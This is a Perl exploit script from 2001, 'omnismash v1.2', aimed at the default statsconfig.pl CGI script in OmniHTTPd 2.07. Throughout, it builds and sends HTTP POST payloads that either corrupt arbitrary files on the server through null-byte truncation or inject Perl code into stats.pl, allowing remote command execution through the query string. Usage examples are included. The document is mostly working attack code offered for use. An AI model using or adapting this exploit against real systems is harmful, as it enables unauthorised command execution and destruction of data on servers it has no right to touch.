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- #!/usr/bin/perl
- ######################################################
- # #
- # omnismash v1.2 by Joe Testa [01.08.2001 9:26PM] #
- # ( joetesta@hushmail.com ) #
- # #
- ######################################################
- # #
- # This program exploits two holes in #
- # 'statsconfig.pl', a cgi script which is installed #
- # by default by OmniHTTPd v2.07 (and possibly older #
- # versions). #
- # #
- # 1.) Any file on the system may be corrupted, #
- # including those on drives the server does not #
- # reside on. #
- # #
- # #
- # Example: #
- # #
- # perl omnismash.pl localhost 80 -corrupt #
- # c:\autoexec.bak #
- # #
- # #
- # 2.) Code can be injected into #
- # '/cgi-bin/stats.pl'. The absolute path to the #
- # the 'cgi-bin' must already be known. #
- # #
- # #
- # Example: #
- # #
- # perl omnismash.pl localhost 80 -inject #
- # c:/httpd/cgi-bin #
- # #
- # This exploit is set to insert a bare 'open()' call #
- # to allow command execution like so: #
- # #
- # http://localhost/cgi-bin/stats.pl?|dir #
- # #
- ######################################################
- use IO::Socket;
- print "\nomnismash v1.2 by Joe Testa [01.08.2001 9:26PM]\n";
- print " ( joetesta\@hushmail.com )\n\n\n";
- if ( scalar @ARGV < 4 ) {
- print "usage: perl omnismash.pl target port " .
- "[ -inject cgipath | -corrupt file ]\n";
- exit();
- }
- $target = $ARGV[ 0 ];
- $port = $ARGV[ 1 ];
- $inject_or_corrupt = $ARGV[ 2 ];
- $stuff = $ARGV[ 3 ];
- print "Creating socket... ";
- $sock = new IO::Socket::INET( PeerAddr => $target,
- PeerPort => int( $port ),
- Proto => 'tcp' );
- die "$!" unless $sock;
- print "done.\n";
- if ( $inject_or_corrupt eq '-inject' ) {
- $worthless_stuff = "perllib=" . $stuff . "/statsconfig.pl%00&" .
- "cgidir=" . $stuff;
- $more_worthless_stuff = "&deflimit=&mostip=on&mostreq=on&" .
- "mostbrowsers=on&timelog=on&mostipnum=5&" .
- "mostreqf=5&mostbrowsernum=5";
- $semi_important_stuff = ";%20if(\$ENV{'QUERY_STRING'})" .
- "{open(QS,\$ENV{'QUERY_STRING'});}\$a%3D1&" .
- "logloc=c%3A%2Fhttpd%2Flogs%2Faccess.log&" .
- "imagebar=%2Fstatsbar.gif&" .
- "serveradd=%3C%21--%23echo+var%3D&" .
- "barwidth=100&barheight=5&listpass=&" .
- "bgcolor=%23FFFFFF&bgimage=&" .
- "ttBGcolor=%23FFFFDD";
- $exploit = $worthless_stuff . $more_worthless_stuff .
- $semi_important_stuff;
- } elsif ( $inject_or_corrupt eq '-corrupt' ) {
- # Cheap hex encoding....
- $stuff =~ s/:/\%3A/g; # ':' => %3A
- $stuff =~ s/\\/\%2F/g; # '\' => %2F
- $stuff =~ s/\//\%2F/g; # '/' => %2F
- $stuff =~ s/ /\%20/g; # ' ' => %20
- $stuff =~ s/\./%2E/g; # '.' => %2E
- # This appends a hex-encoded null character to the file to truncate
- # text that is appended to it by statsconfig.pl during processing.
- $stuff .= "%00";
- # Construct the exploit string. This does nothing more than set
- # the 'perllib' and 'cgidir' fields to our null-padded filename,
- # then add additional fields to pass a series of "if()" checks.
- $worthless_stuff = "&deflimit=&mostip=on&mostreq=on&" .
- "mostbrowsers=on&timelog=on&mostipnum=5&" .
- "mostreqf=5&mostbrowsernum=5&" .
- "logloc=c%3A%2Fhttpd%2Flogs%2Faccess.log&" .
- "imagebar=%2Fstatsbar.gif&" .
- "serveradd=%3C%21--%23echo+var%3D&" .
- "barwidth=100&barheight=5&listpass=&" .
- "bgcolor=%23FFFFFF&bgimage=&" .
- "ttBGcolor=%23FFFFDD";
- $exploit = "perllib=" . $stuff . "&cgidir=" . $stuff .
- $worthless_stuff;
- }
- $length = length( $exploit );
- # Write the string to the socket...
- print "Sending exploit string... ";
- print $sock "POST /cgi-bin/statsconfig.pl HTTP/1.0\n";
- print $sock "Content-type: application/x-www-form-urlencoded\n";
- print $sock "Content-length: $length\n\n";
- print $sock $exploit;
- print "done.\n";
- # Read result from server...
- print "Waiting for response...\n\n";
- read( $sock, $buffer, 1024 );
- print $buffer;
- close( $sock );
- exit();